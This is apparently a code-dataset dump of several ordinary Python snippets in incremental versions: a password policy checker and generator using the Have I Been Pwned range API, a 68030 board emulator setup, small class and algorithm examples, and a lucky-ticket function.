min_lower=0, check_breaches=False, func=None\n ):\n self.min_length = min_length\n self.min_digits = min_digits\n self.min_special = min_special\n self.min_alpha = min_alpha\n self.min_upper = min_upper\n self.min_lower = min_lower\n self.check_breaches = check_breaches\n self.func = func\n\n def check(self, password):\n \"\"\"Check a password against the requirements\n\n Args:\n password (str): The password to check\n\n Returns:\n bool: Whether the password meets all the given requirements\n \"\"\"\n if len(password) < self.min_length:\n return False\n digits = len(findall('\\\\d', password))\n if digits < self.min_digits:\n return False\n special_chars = sum(v for k, v in Counter(password).items() if k in\n punctuation)\n if special_chars < self.min_special:\n return False\n alpha_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_letters)\n if alpha_chars < self.min_alpha:\n return False\n upper_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_uppercase)\n if upper_chars < self.min_upper:\n return False\n lower_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_lowercase)\n if lower_chars < self.min_lower:\n return False\n if self.check_breaches and check_password(password):\n return False\n if self.func and not self.func(password):\n return False\n return True\n\n\nclass PasswordGenerator:\n \"\"\"A random password generator\n\n Args:\n length (int): The length of the password\n\n Keyword Args:\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n \"\"\"\n\n def __init__(self, length, 
*, uppercase=True, lowercase=True, digits=\n True, special=True):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(self, length=None, uppercase=None, lowercase=None, digits=\n None, special=None):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n allowed_chars = ''\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else ''\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else ''\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n if digits is not None:\n allowed_chars += all_digits if digits else ''\n elif self.digits:\n allowed_chars += all_digits\n if special is not None:\n allowed_chars += punctuation if special else ''\n elif self.special:\n allowed_chars += punctuation\n return ''.join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-4": "__version__ = '1.2.0'\nimport hashlib\nfrom collections import Counter\nfrom re import findall\nfrom secrets import choice\nfrom string import ascii_letters, ascii_lowercase, ascii_uppercase\nfrom string import digits as all_digits\nfrom string import punctuation\nimport requests\n\n\ndef check_password(password):\n \"\"\"Check a given password against known data breaches\n\n Note:\n This method uses the `Have I Been Pwned <https://haveibeenpwned.com/>`_ Passwords API. The unhashed password nor its full `SHA-1 <https://en.wikipedia.org/wiki/SHA-1>`_ hash never leave the device.\n\n Args:\n password (str): The password to check\n\n Returns:\n int: The number of times the password has been found\n \"\"\"\n sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest()\n response = requests.get(f'https://api.pwnedpasswords.com/range/{sha1[:5]}')\n hash_suffix_list = [x.split(':') for x in response.text.splitlines(False)]\n try:\n count = [count for suffix, count in hash_suffix_list if sha1.\n endswith(suffix.lower())][0]\n except IndexError:\n return 0\n return int(count)\n\n\nclass PasswordRequirements:\n \"\"\"A set of requirements to check passwords against\n\n Keyword Args:\n min_length (int): The minimum length of the password\n min_digits (int): The minimum number of digits in the password\n min_special (int): The minimum number of special characters in the password\n min_alpha (int): The minimum number of alphabetical characters in the password\n min_upper (int): The minimum number of uppercase letters in the password\n min_lower (int): The minimum number of lowercase letters in the password\n check_breaches (bool): Whether to ensure that passwords aren't found in known data breaches (uses :meth:`~passwd.check_password`)\n func (function): A function that takes in a password (:class:`str`) and returns a :class:`bool` that must be ``True`` for the password to meet all requirements\n \"\"\"\n\n def __init__(self, *, min_length=0, min_digits=0, min_special=0,\n min_alpha=0, min_upper=0, min_lower=0, check_breaches=False, func=None\n ):\n self.min_length = min_length\n self.min_digits = min_digits\n self.min_special = min_special\n self.min_alpha = min_alpha\n self.min_upper = min_upper\n self.min_lower = min_lower\n self.check_breaches = check_breaches\n self.func = func\n\n def check(self, password):\n \"\"\"Check a password against the requirements\n\n Args:\n password (str): The password to check\n\n Returns:\n bool: Whether the password meets all the given requirements\n \"\"\"\n if len(password) < self.min_length:\n return False\n digits = len(findall('\\\\d', password))\n if digits < self.min_digits:\n return False\n special_chars = sum(v for k, v in Counter(password).items() if k in\n punctuation)\n if special_chars < self.min_special:\n return False\n alpha_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_letters)\n if alpha_chars < self.min_alpha:\n return False\n upper_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_uppercase)\n if upper_chars < self.min_upper:\n return False\n lower_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_lowercase)\n if lower_chars < self.min_lower:\n return False\n if self.check_breaches and check_password(password):\n return False\n if self.func and not self.func(password):\n return False\n return True\n\n\nclass PasswordGenerator:\n \"\"\"A random password generator\n\n Args:\n length (int): The length of the password\n\n Keyword Args:\n uppercase (bool): Whether to allow uppercase 
letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n \"\"\"\n\n def __init__(self, length, *, uppercase=True, lowercase=True, digits=\n True, special=True):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(self, length=None, uppercase=None, lowercase=None, digits=\n None, special=None):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n allowed_chars = ''\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else ''\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else ''\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n if digits is not None:\n allowed_chars += all_digits if digits else ''\n elif self.digits:\n allowed_chars += all_digits\n if special is not None:\n allowed_chars += punctuation if special else ''\n elif self.special:\n allowed_chars += punctuation\n return ''.join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-5": "__version__ = \"1.2.0\"\n\nimport hashlib\nfrom collections import Counter\nfrom re import findall\nfrom secrets import choice\nfrom string import ascii_letters, ascii_lowercase, ascii_uppercase\nfrom string import digits as all_digits\nfrom string import punctuation\n\nimport requests\n\n\ndef check_password(password):\n \"\"\"Check a given password against known data breaches\n\n Note:\n This method uses the `Have I Been Pwned <https://haveibeenpwned.com/>`_ Passwords API. The unhashed password nor its full `SHA-1 <https://en.wikipedia.org/wiki/SHA-1>`_ hash never leave the device.\n\n Args:\n password (str): The password to check\n\n Returns:\n int: The number of times the password has been found\n \"\"\"\n\n sha1 = hashlib.sha1(password.encode(\"utf-8\")).hexdigest()\n\n response = requests.get(f\"https://api.pwnedpasswords.com/range/{sha1[:5]}\")\n\n hash_suffix_list = [x.split(\":\") for x in response.text.splitlines(False)]\n\n try:\n count = [\n count for suffix, count in hash_suffix_list if sha1.endswith(suffix.lower())\n ][0]\n except IndexError:\n return 0\n\n return int(count)\n\n\nclass PasswordRequirements:\n \"\"\"A set of requirements to check passwords against\n\n Keyword Args:\n min_length (int): The minimum length of the password\n min_digits (int): The minimum number of digits in the password\n min_special (int): The minimum number of special characters in the password\n min_alpha (int): The minimum number of alphabetical characters in the password\n min_upper (int): The minimum number of uppercase letters in the password\n min_lower (int): The minimum number of lowercase letters in the password\n check_breaches (bool): Whether to ensure that passwords aren't found in known data breaches (uses :meth:`~passwd.check_password`)\n func (function): A function that takes in a password (:class:`str`) and returns a :class:`bool` that must be ``True`` for the password to meet all requirements\n \"\"\"\n\n def __init__(\n self,\n *,\n min_length=0,\n min_digits=0,\n min_special=0,\n min_alpha=0,\n min_upper=0,\n min_lower=0,\n check_breaches=False,\n func=None,\n ):\n self.min_length = min_length\n self.min_digits = min_digits\n self.min_special = min_special\n self.min_alpha = min_alpha\n self.min_upper = min_upper\n self.min_lower = min_lower\n self.check_breaches = check_breaches\n self.func = func\n\n def check(self, password):\n \"\"\"Check a password against the requirements\n\n Args:\n password (str): The password to check\n\n Returns:\n bool: Whether the password meets all the given requirements\n \"\"\"\n\n if len(password) < self.min_length:\n return False\n\n digits = len(findall(r\"\\d\", password))\n if digits < self.min_digits:\n return False\n\n special_chars = sum(v for k, v in Counter(password).items() if k in punctuation)\n if special_chars < self.min_special:\n return False\n\n alpha_chars = sum(v for k, v in Counter(password).items() if k in ascii_letters)\n if alpha_chars < self.min_alpha:\n return False\n\n upper_chars = sum(\n v for k, v in Counter(password).items() if k in ascii_uppercase\n )\n if upper_chars < self.min_upper:\n return False\n\n lower_chars = sum(\n v for k, v in Counter(password).items() if k in ascii_lowercase\n )\n if lower_chars < self.min_lower:\n return False\n\n if self.check_breaches and check_password(password):\n return False\n\n if self.func and not self.func(password):\n return False\n\n return True\n\n\nclass PasswordGenerator:\n \"\"\"A random password generator\n\n Args:\n length (int): The length of the 
password\n\n Keyword Args:\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n \"\"\"\n\n def __init__(\n self, length, *, uppercase=True, lowercase=True, digits=True, special=True\n ):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(\n self, length=None, uppercase=None, lowercase=None, digits=None, special=None\n ):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n \n allowed_chars = \"\"\n\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else \"\"\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else \"\"\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n\n if digits is not None:\n allowed_chars += all_digits if digits else \"\"\n elif self.digits:\n allowed_chars += all_digits\n\n if special is not None:\n allowed_chars += punctuation if special else \"\"\n elif self.special:\n allowed_chars += punctuation\n\n return \"\".join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-ids": [
4,
6,
10,
12,
13
]
}
|
[
4,
6,
10,
12,
13
] |
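Illustrative use of the passwd API from the row above; the import path is an assumption and check_breaches is left False so the sketch stays offline (enabling it would call the Have I Been Pwned range API):

from passwd import PasswordGenerator, PasswordRequirements  # module name assumed

reqs = PasswordRequirements(min_length=12, min_digits=2, min_special=1,
                            min_upper=1, min_lower=1, check_breaches=False)
gen = PasswordGenerator(16)

candidate = gen.generate()
while not reqs.check(candidate):  # resample until the policy is satisfied
    candidate = gen.generate()
print(len(gen), candidate)        # 16, plus a policy-compliant password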
from emulator import Emulator
from device import Device
from devices.compactflash import CompactFlash
from devices.mc68681 import MC68681
from musashi import m68k
def add_arguments(parser):
parser.add_argument('--rom',
type=str,
help='ROM image')
parser.add_argument('--dram-size',
type=int,
default=16,
help='DRAM size; boards may have 16, 64 or 128M')
parser.add_argument('--cf-width',
type=int,
default=8,
help='CompactFlash interface width, 8 or 16')
CompactFlash.add_arguments(parser)
MC68681.add_arguments(parser)
class CB030Remap(Device):
def __init__(self, args, **options):
super().__init__(args=args,
name='CB030Remap',
required_options=['address'],
**options)
# no registers, just a 4k aperture
self.size = 0x1000
self._did_remap = False
self._dram_size = args.dram_size
def access(self, operation, offset, size, value):
if not self._did_remap:
# remove the low alias of the EEPROM
self.emu.remove_memory(base=0)
# and add the previously-masked DRAM
self.emu.add_memory(base=0x0000000, size=self._dram_size * 1024 * 1024)
return 0
class CB030Ticker(Device):
def __init__(self, args, **options):
super().__init__(args=args,
name='CB030Ticker',
required_options=['address'],
**options)
# no registers, just a 4k aperture
self.size = 0x1000
# core clock @ 24MHz, 100Hz tick rate
self._tick_cycles = int(self.emu.cycle_rate / 100)
self.reset()
def reset(self):
self._stop()
self._tick_fired = False
def access(self, operation, offset, size, value):
if offset < 0x800:
self._stop()
else:
self._start()
def _stop(self):
self.callback_cancel('tick')
self._ticker_on = False
def _start(self):
if not self._ticker_on:
self.callback_every(self._tick_cycles, 'tick', self._tick)
self._ticker_on = True
def _tick(self):
if self._ticker_on:
self._tick_fired = True
self.assert_ipl()
def get_vector(self):
if self._tick_fired:
self._tick_fired = False
return M68K_IRQ_AUTOVECTOR
return M68K_IRQ_SPURIOUS
def configure(args):
"""create and configure an emulator"""
emu = Emulator(args,
cpu='68030',
frequency=24 * 1000 * 1000)
# initially only the EEPROM exists; aliased at 0 all the way up to 0xfe000000
# we only map the low and high aliases, as the intermediates aren't interesting
emu.add_memory(base=0, size=512 * 1024, writable=False, from_file=args.rom)
emu.add_memory(base=0xfe000000, size=512 * 1024, writable=False, from_file=args.rom)
emu.add_device(args,
MC68681,
address=0xfffff000,
interrupt=m68k.IRQ_2,
register_arrangement='16-bit-doubled')
emu.add_device(args,
CompactFlash,
address=0xffffe000,
register_arrangement='8-bit' if args.cf_width == 8 else '16-bit')
emu.add_device(args,
CB030Remap,
address=0xffff8000)
emu.add_device(args,
CB030Ticker,
address=0xffff9000,
interrupt=m68k.IRQ_6)
return emu
|
normal
|
{
"blob_id": "9eef202a42bfc10b2f52d1b9153d664c5046c13f",
"index": 1965,
"step-1": "<mask token>\n\n\nclass CB030Ticker(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Ticker', required_options=[\n 'address'], **options)\n self.size = 4096\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 2048:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n <mask token>\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CB030Remap(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Remap', required_options=[\n 'address'], **options)\n self.size = 4096\n self._did_remap = False\n self._dram_size = args.dram_size\n\n def access(self, operation, offset, size, value):\n if not self._did_remap:\n self.emu.remove_memory(base=0)\n self.emu.add_memory(base=0, size=self._dram_size * 1024 * 1024)\n return 0\n\n\nclass CB030Ticker(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Ticker', required_options=[\n 'address'], **options)\n self.size = 4096\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 2048:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n\n def _start(self):\n if not self._ticker_on:\n self.callback_every(self._tick_cycles, 'tick', self._tick)\n self._ticker_on = True\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef add_arguments(parser):\n parser.add_argument('--rom', type=str, help='ROM image')\n parser.add_argument('--dram-size', type=int, default=16, help=\n 'DRAM size; boards may have 16, 64 or 128M')\n parser.add_argument('--cf-width', type=int, default=8, help=\n 'CompactFlash interface width, 8 or 16')\n CompactFlash.add_arguments(parser)\n MC68681.add_arguments(parser)\n\n\nclass CB030Remap(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Remap', required_options=[\n 'address'], **options)\n self.size = 4096\n self._did_remap = False\n self._dram_size = args.dram_size\n\n def access(self, operation, offset, size, value):\n if not self._did_remap:\n self.emu.remove_memory(base=0)\n self.emu.add_memory(base=0, size=self._dram_size * 1024 * 1024)\n return 0\n\n\nclass CB030Ticker(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Ticker', required_options=[\n 'address'], **options)\n self.size = 4096\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 2048:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n\n def _start(self):\n if not self._ticker_on:\n self.callback_every(self._tick_cycles, 'tick', self._tick)\n self._ticker_on = True\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\ndef configure(args):\n \"\"\"create and configure an emulator\"\"\"\n emu = Emulator(args, cpu='68030', frequency=24 * 1000 * 1000)\n emu.add_memory(base=0, size=512 * 1024, writable=False, from_file=args.rom)\n emu.add_memory(base=4261412864, size=512 * 1024, writable=False,\n from_file=args.rom)\n emu.add_device(args, MC68681, address=4294963200, interrupt=m68k.IRQ_2,\n register_arrangement='16-bit-doubled')\n emu.add_device(args, CompactFlash, address=4294959104,\n register_arrangement='8-bit' if args.cf_width == 8 else '16-bit')\n emu.add_device(args, CB030Remap, address=4294934528)\n emu.add_device(args, CB030Ticker, address=4294938624, interrupt=m68k.IRQ_6)\n return emu\n",
"step-4": "from emulator import Emulator\nfrom device import Device\nfrom devices.compactflash import CompactFlash\nfrom devices.mc68681 import MC68681\nfrom musashi import m68k\n\n\ndef add_arguments(parser):\n parser.add_argument('--rom', type=str, help='ROM image')\n parser.add_argument('--dram-size', type=int, default=16, help=\n 'DRAM size; boards may have 16, 64 or 128M')\n parser.add_argument('--cf-width', type=int, default=8, help=\n 'CompactFlash interface width, 8 or 16')\n CompactFlash.add_arguments(parser)\n MC68681.add_arguments(parser)\n\n\nclass CB030Remap(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Remap', required_options=[\n 'address'], **options)\n self.size = 4096\n self._did_remap = False\n self._dram_size = args.dram_size\n\n def access(self, operation, offset, size, value):\n if not self._did_remap:\n self.emu.remove_memory(base=0)\n self.emu.add_memory(base=0, size=self._dram_size * 1024 * 1024)\n return 0\n\n\nclass CB030Ticker(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Ticker', required_options=[\n 'address'], **options)\n self.size = 4096\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 2048:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n\n def _start(self):\n if not self._ticker_on:\n self.callback_every(self._tick_cycles, 'tick', self._tick)\n self._ticker_on = True\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\ndef configure(args):\n \"\"\"create and configure an emulator\"\"\"\n emu = Emulator(args, cpu='68030', frequency=24 * 1000 * 1000)\n emu.add_memory(base=0, size=512 * 1024, writable=False, from_file=args.rom)\n emu.add_memory(base=4261412864, size=512 * 1024, writable=False,\n from_file=args.rom)\n emu.add_device(args, MC68681, address=4294963200, interrupt=m68k.IRQ_2,\n register_arrangement='16-bit-doubled')\n emu.add_device(args, CompactFlash, address=4294959104,\n register_arrangement='8-bit' if args.cf_width == 8 else '16-bit')\n emu.add_device(args, CB030Remap, address=4294934528)\n emu.add_device(args, CB030Ticker, address=4294938624, interrupt=m68k.IRQ_6)\n return emu\n",
"step-5": "from emulator import Emulator\nfrom device import Device\nfrom devices.compactflash import CompactFlash\nfrom devices.mc68681 import MC68681\nfrom musashi import m68k\n\n\ndef add_arguments(parser):\n parser.add_argument('--rom',\n type=str,\n help='ROM image')\n parser.add_argument('--dram-size',\n type=int,\n default=16,\n help='DRAM size; boards may have 16, 64 or 128M')\n parser.add_argument('--cf-width',\n type=int,\n default=8,\n help='CompactFlash interface width, 8 or 16')\n CompactFlash.add_arguments(parser)\n MC68681.add_arguments(parser)\n\n\nclass CB030Remap(Device):\n def __init__(self, args, **options):\n super().__init__(args=args,\n name='CB030Remap',\n required_options=['address'],\n **options)\n\n # no registers, just a 4k aperture\n self.size = 0x1000\n self._did_remap = False\n self._dram_size = args.dram_size\n\n def access(self, operation, offset, size, value):\n if not self._did_remap:\n # remove the low alias of the EEPROM\n self.emu.remove_memory(base=0)\n\n # and add the previously-masked DRAM\n self.emu.add_memory(base=0x0000000, size=self._dram_size * 1024 * 1024)\n\n return 0\n\n\nclass CB030Ticker(Device):\n def __init__(self, args, **options):\n super().__init__(args=args,\n name='CB030Ticker',\n required_options=['address'],\n **options)\n\n # no registers, just a 4k aperture\n self.size = 0x1000\n # core clock @ 24MHz, 100Hz tick rate\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 0x800:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n\n def _start(self):\n if not self._ticker_on:\n self.callback_every(self._tick_cycles, 'tick', self._tick)\n self._ticker_on = True\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\ndef configure(args):\n \"\"\"create and configure an emulator\"\"\"\n\n emu = Emulator(args,\n cpu='68030',\n frequency=24 * 1000 * 1000)\n # initially only the EEPROM exists; aliased at 0 all the way up to 0xfe000000\n # we only map the low and high aliases, as the intermediates aren't interesting\n emu.add_memory(base=0, size=512 * 1024, writable=False, from_file=args.rom)\n emu.add_memory(base=0xfe000000, size=512 * 1024, writable=False, from_file=args.rom)\n\n emu.add_device(args,\n MC68681,\n address=0xfffff000,\n interrupt=m68k.IRQ_2,\n register_arrangement='16-bit-doubled')\n emu.add_device(args,\n CompactFlash,\n address=0xffffe000,\n register_arrangement='8-bit' if args.cf_width == 8 else '16-bit')\n emu.add_device(args,\n CB030Remap,\n address=0xffff8000)\n emu.add_device(args,\n CB030Ticker,\n address=0xffff9000,\n interrupt=m68k.IRQ_6)\n return emu\n",
"step-ids": [
7,
11,
13,
14,
15
]
}
|
[
7,
11,
13,
14,
15
] |
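One figure in the row above is worth checking by hand: CB030Ticker derives its period from the emulator's cycle rate and a 100 Hz tick, so at the 24 MHz clock passed to Emulator each tick spans 240,000 CPU cycles. A standalone arithmetic check:

cycle_rate = 24 * 1000 * 1000        # 24 MHz core clock, as configured above
tick_cycles = int(cycle_rate / 100)  # 100 Hz tick rate
assert tick_cycles == 240_000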
class Leg():
__smelly = True
def bend_knee(self):
print("knee bent")
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self,smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly
|
normal
|
{
"blob_id": "a4ecc578a163ee4657a2c9302f79f15c2e4e39de",
"index": 672,
"step-1": "class Leg:\n <mask token>\n <mask token>\n\n @property\n def smelly(self):\n return self.__smelly\n <mask token>\n\n def is_smelly(self):\n return self.__smelly\n",
"step-2": "class Leg:\n <mask token>\n <mask token>\n\n @property\n def smelly(self):\n return self.__smelly\n\n @smelly.setter\n def smelly(self, smell):\n self.__smelly = smell\n\n def is_smelly(self):\n return self.__smelly\n",
"step-3": "class Leg:\n <mask token>\n\n def bend_knee(self):\n print('knee bent')\n\n @property\n def smelly(self):\n return self.__smelly\n\n @smelly.setter\n def smelly(self, smell):\n self.__smelly = smell\n\n def is_smelly(self):\n return self.__smelly\n",
"step-4": "class Leg:\n __smelly = True\n\n def bend_knee(self):\n print('knee bent')\n\n @property\n def smelly(self):\n return self.__smelly\n\n @smelly.setter\n def smelly(self, smell):\n self.__smelly = smell\n\n def is_smelly(self):\n return self.__smelly\n",
"step-5": "class Leg():\n __smelly = True\n\n def bend_knee(self):\n print(\"knee bent\")\n\n\n @property\n def smelly(self):\n return self.__smelly\n\n @smelly.setter\n def smelly(self,smell):\n self.__smelly = smell\n \n\n def is_smelly(self):\n return self.__smelly",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
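Behavior sketch for the Leg property pair above, assuming the class is in scope: the @property getter and @smelly.setter both wrap the name-mangled __smelly attribute, so attribute syntax and is_smelly() stay in sync:

leg = Leg()
print(leg.smelly)       # True, read through the @property getter
leg.smelly = False      # routed through the @smelly.setter
print(leg.is_smelly())  # False, same underlying _Leg__smelly attribute
leg.bend_knee()         # prints "knee bent"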
# terrascript/spotinst/__init__.py
import terrascript
class spotinst(terrascript.Provider):
pass
|
normal
|
{
"blob_id": "0ae626df5a471af77f7361bb765b46b861ee8a2c",
"index": 7142,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass spotinst(terrascript.Provider):\n pass\n",
"step-3": "import terrascript\n\n\nclass spotinst(terrascript.Provider):\n pass\n",
"step-4": "# terrascript/spotinst/__init__.py\n\nimport terrascript\n\nclass spotinst(terrascript.Provider):\n pass",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
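A hedged sketch of how a python-terrascript Provider subclass like the one above is typically wired into a configuration; the token keyword and its value are placeholders, not taken from the row:

import terrascript

class spotinst(terrascript.Provider):
    pass

config = terrascript.Terrascript()
config += spotinst(token='SPOTINST_API_TOKEN')  # placeholder credential
# the config object can then be serialized to Terraform JSON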
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def letterCombinations(self, digits):
"""
:type digits: str
:rtype: List[str]
"""
if not digits:
return []
result_set = []
letters = {'2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl', '6':
'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz'}
def permutate(index, result, result_set):
if index == len(digits):
result_set.append(''.join(result))
return
for letter in letters[digits[index]]:
result[index] = letter
permutate(index + 1, result, result_set)
permutate(0, ['' for _ in digits], result_set)
return result_set
|
flexible
|
{
"blob_id": "aec311cae7cb6cbe3e3a927a133ec20a2d2afbf5",
"index": 1312,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n if not digits:\n return []\n result_set = []\n letters = {'2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl', '6':\n 'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz'}\n\n def permutate(index, result, result_set):\n if index == len(digits):\n result_set.append(''.join(result))\n return\n for letter in letters[digits[index]]:\n result[index] = letter\n permutate(index + 1, result, result_set)\n permutate(0, ['' for _ in digits], result_set)\n return result_set\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
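Quick usage check for the Solution above, assuming the class is in scope: '23' expands 'abc' against 'def', giving nine combinations in exactly the order the recursion enumerates them, and the early return keeps empty input empty:

s = Solution()
print(s.letterCombinations('23'))
# ['ad', 'ae', 'af', 'bd', 'be', 'bf', 'cd', 'ce', 'cf']
print(s.letterCombinations(''))  # []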
# Алексей Головлев, группа БСБО-07-19
def lucky(ticket):
def sum_(number):
number = str(number)
while len(number) != 6:
number = '0' + number
x = list(map(int, number))
return sum(x[:3]) == sum(x[3:])
return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'
lastTicket = 123456
print(lucky(100001))
lastTicket = 123321
print(lucky(100001))
|
normal
|
{
"blob_id": "85ac851e28dba3816f18fefb727001b8e396cc2b",
"index": 5278,
"step-1": "<mask token>\n",
"step-2": "def lucky(ticket):\n\n def sum_(number):\n number = str(number)\n while len(number) != 6:\n number = '0' + number\n x = list(map(int, number))\n return sum(x[:3]) == sum(x[3:])\n return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'\n\n\n<mask token>\n",
"step-3": "def lucky(ticket):\n\n def sum_(number):\n number = str(number)\n while len(number) != 6:\n number = '0' + number\n x = list(map(int, number))\n return sum(x[:3]) == sum(x[3:])\n return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'\n\n\n<mask token>\nprint(lucky(100001))\n<mask token>\nprint(lucky(100001))\n",
